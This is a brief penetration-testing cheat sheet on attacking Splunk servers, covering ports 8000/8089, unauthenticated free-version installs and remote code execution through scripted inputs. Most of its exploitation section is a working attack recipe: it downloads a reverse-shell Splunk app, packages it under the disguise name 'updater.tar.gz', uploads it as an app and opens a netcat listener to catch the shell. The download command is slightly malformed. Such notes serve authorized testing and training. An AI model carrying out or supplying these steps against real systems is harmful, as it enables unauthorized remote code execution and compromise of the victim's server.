Splunk
Port 8000 and 8089 (Splunkd httpd service)
Enumeration
Splunk enterprise trial will revert to free version after 60 days that doesnt require authentication
Exploitation
Code Execution
server-side Django applications, REST endpoints, scripted inputs, and alerting scripts. A common method of gaining remote code execution on a Splunk server is through the use of a scripted input. These are designed to help integrate Splunk with data sources such as APIs or file servers that require custom methods to access. Scripted inputs are intended to run these scripts, with STDOUT provided as input to Splunk.
Create the zip file
$ wget https://github.com/0xjpuff/reverse_shell_splunk
$ cd reverse_shell_splunk
$ # edit the rev.py and rev.ps1 inside bin folder
$ tar -cvzf updater.tar.gz reverse_shell_splunk/
Login -> Install app from file
Setup a listener
$ sudo nc -lnvp 443
Note: if we are attacking linux, we need to edit rev.py
Last updated